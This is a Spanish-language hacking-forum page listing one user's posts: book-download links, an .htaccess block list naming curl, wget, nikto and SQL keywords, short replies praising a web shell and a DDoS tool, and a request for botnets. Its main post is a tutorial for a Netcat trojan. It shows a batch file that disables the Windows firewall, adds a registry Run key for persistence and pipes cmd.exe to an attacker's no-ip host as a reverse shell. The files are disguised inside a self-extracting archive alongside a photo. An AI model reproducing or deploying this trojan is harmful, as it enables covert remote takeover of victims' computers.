Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - july

Páginas 1 2
#21
Seguridad web y en servidores / Implementación de servidores con GNU/Linux (lectura rec. para serv. CentOS).
Noviembre 20, 2012, 11:51:56 AM

"
Implementación de Servidores con GNU/Linux" es un libro escrito por el Mexicano Joel Barrios Dueñas donde pretende  cubrir gran cantidad de aspectos relacionados con el sistema operativo GNU/Linux, desde la instalación del mismo, comandos básicos del sistema hasta la configuración e Implementación de servidores para diferentes fines...
Lectura muy recomendada para montar servers en centos y esta re completo.

DESCARGA: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#22
Cursos, manuales y libros / Linux Máxima Seguridad (Edicion Especial) E-BooK en PDF
Noviembre 20, 2012, 11:45:07 AM

Libro enfocado para aquellos administradores de sistemas, gestores y usuarios de Linux que deseen proteger servidores y estaciones de trabajo Linux contra intrusiones no autoriazadas y otras amenazas externas para la integridad de sus sistemas. Esta guia exclusiva de la seguridad en Linux la ha escrito un "hacker" con años de experiencia y en ella se identifican los agujeros y fallos de seguridad existente y potenciales, ademas de como solucionarlos.

DESCARGA: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#23
Seguridad web y en servidores / Libro muy bueno para la administración de servidores montados en Debian.
Noviembre 20, 2012, 11:38:59 AM
El libro abarca todos los temas que un administrador debe dominar, a partir de la instalación y actualización del sistema hasta la creación de paquetes, compilación del kernel y otras tareas avanzadas.



ISBN:  9791091414005

Copyright: Freexian SARL (Licencia pública general de GNU)

Edición: Primera Edición

Editor: Freexian SARL

Publicado: 9 de mayo de 2012

Idioma: Inglés

Páginas: 495


DESCARGA: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#24
Seguridad web y en servidores / Proteger nuestro server web de ataques con .htaccess
Noviembre 20, 2012, 11:33:08 AM

Hola amigos hoy les traigo un .htaccess para proteger sus server web

Código: text
#Evitar escaneos, manipulación e inyeccion SQL (SQL, XSS, etc)
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(-|\.|') [OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*)(<|>|%3C|<span class="IL_AD" id="IL_AD1">%3E</span>)(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget)(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*)(libwww-perl|libwwwperl|snoopy|curl|wget|winhttp|python|nikto|scan|clshttp|archiver|loader|<span class="IL_AD" id="IL_AD3">email</span>|harvest|fetch|extract|grab|miner|suck|reaper|leach|havij)(.*) [NC,OR]
RewriteCond %{REQUEST_URI} ^(/,|/;|/<|/>|/'|/`|/%2C|/%3C|/%3E|/%27|/////) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(%00|%08|%09|%0A|%0B|%0C|%0D|%0E|%0F|%2C|<|>|'|%3C|%3E|%26%23|%27|%60)(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%00|%08|%09|%0A|%0B|%0C|%0D|%0E|%0F|%2C|%3C|%3E|%27|%26%23|%60)(.*) [NC,OR]
RewriteCond %{HTTP_COOKIE} ^(.*)(<|>|'|%3C|%3E|%27)(.*) [NC]
RewriteRule ^(.*)$ index.php [NC]
 
#Evita manipulacion en la URL
RewriteCond %{REQUEST_METHOD} ^(HEAD|<span class="IL_AD" id="IL_AD11">TRACE</span>|DELETE|TRACK) [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(\\r|\\n|%0A|%0D).* [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|:|<|>|">|"<|/|\\\.\.\\).{0,9999}.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC]
RewriteRule ^(.*)$ index.php [NC]
#Complica los ataques Remote File include y Local File include
 
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* – [F]


eso es todo saludosssss
#25
Bugs y Exploits / Re:I-47 v1.3 Shell Private
Julio 08, 2012, 08:23:08 PM
Buen aporte he usado la anterior me la guardo y el login se cambia esa es la gracia

saludosssssssssssss
#26
Dudas y pedidos generales / Re:botnets
Noviembre 02, 2011, 12:03:23 PM
bien mucha sgracias por la respuesta

saludo :-*
#27
Python / Re:[Código-Python]Usuarios y Rangos Underc0de.org - JaAViEr
Noviembre 02, 2011, 11:51:36 AM
si me encantaria para el irc

ademas para incentivar las cosoas en el irc

saludossssssssss :-* :-*
#28
Python / Re:PythonLOIC - Nueva herramienta para ataques Ddos
Noviembre 02, 2011, 11:48:18 AM
si esta muy bueno lo se jaja
pero ahora ya esta el refref
un saludo y gracias por el aporte
:-* :-*
#29
Hacking / Re:TUTO DE NETCAT TROYANO BY JULY
Agosto 30, 2011, 08:53:17 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Copiado... ingresado al kernel del coco (cabeza) ;D

que decis?



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
July Edite el post para que quede mas vistoso y elegante, en otra tabula bien para que quede mejor el tutorial..

Gracias por aportar..

Saludos :P

gracias por arreglarlo bro

PD: No hagas doble post!! Editalo el mensaje Saludos

Atte:Snifer
#30
Hacking / [TUTORIAL] Netcat Troyano by July
Agosto 30, 2011, 12:45:49 PM
Te explico un poco:

Reverse shell

Es cuando la victima se conecta a vos y te da una shell. El no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos)  esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) ya explicado esto que hacemos con el netcat hacemos un bat con el nombre vamos.bat

Y le ponemos estos comandos:

Código: text
nc.exe


hay que copiarselo a la victima en

Código: text
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe


ademas a este bat ponerlo en el registro run, para que?

para que cada vez que se prenda la maquina me lo ejecute

Código: text
start C:\Extracted\data.exe


Ademas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:

Código: Vbs
Set objFirewall = CreateObject("HNetCfg.FwMgr") 
  Set objPolicy = objFirewall.LocalPolicy.CurrentProfile 

  objPolicy.FirewallEnabled = false


Esto lo guardamos como  desa.vbs tambien en el bat lo hacemos ejecutar

Código: text
start C:\Extracted\desa.vbs


lo unico que falta poner el comando para conectarnos

Código: text
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443



bueno el bat quedaria asi:

Código: Batch
@echo off
start C:\Extracted\desa.vbs
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f 
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443


y el desa.vbs quedaria asi:

Código: vbs
Set objFirewall = CreateObject("HNetCfg.FwMgr") 
  Set objPolicy = objFirewall.LocalPolicy.CurrentProfile 

  objPolicy.FirewallEnabled = false


Ahora despues que tenes eso,  al bat lo pasamos a exe con Bat To Exe Converter.exe luego unimos todo (nc.exe, desa.vbs, vamos.exe)  al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden) yo uso el programa SFX COMPILER

terminando, en tu maquina pones en un bat :

Código: Batch
nc -vv -l -p 80


en otro bat

Código: Batch
nc -vv -l -p 443


ejecutas los dos y esperas la coneccion  antes desabilita tu firewall.

Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:


en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:

Código: Batch
nc  ip de tu maquina local 80 | cmd.exe | nc ip de tu maquina local 443


para colocar "|" precional alt + ctrl + 1


Ahora en nuestra maquina desconectar el firewall de windows luego realizar 2 bat y los mismo colocar un comando:

este es 1

Código: Batch
nc -vv -l -p 80


este es 2

Código: Batch
nc -vv -l -p 443


OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.



ESPERO QUE LO ENTIENDAS
#31
Dudas y pedidos generales / Re:botnets
Agosto 30, 2011, 10:54:33 AM
si lo vi antrax pero el video me da error cuando lo descomprimo
saludos y graciassss
#32
Dudas y pedidos generales / [SOLUCIONADO] Botnets
Agosto 30, 2011, 10:22:41 AM
hola gente

estoy empezando con esto de botnets quisiera saber alguno que se conecte al irc. vi que aca habia muchos pero sin referencia y no se cual elegir ni cual es mejor  o cual sirve para el irc o para web o escritorio me gustaria si alguien me puede ayudar  y decirme cual es el mejor o por esperiencia cual me conviene muchas gracias por todo y  son una gran comunidad

saludos :-*
#33
Java / Re:[Aporte]Mi primera aplicacion para celular
Agosto 30, 2011, 08:48:16 AM
muy bueno sigue
graciasssssssssssssssssssssssssssssssss
Páginas 1 2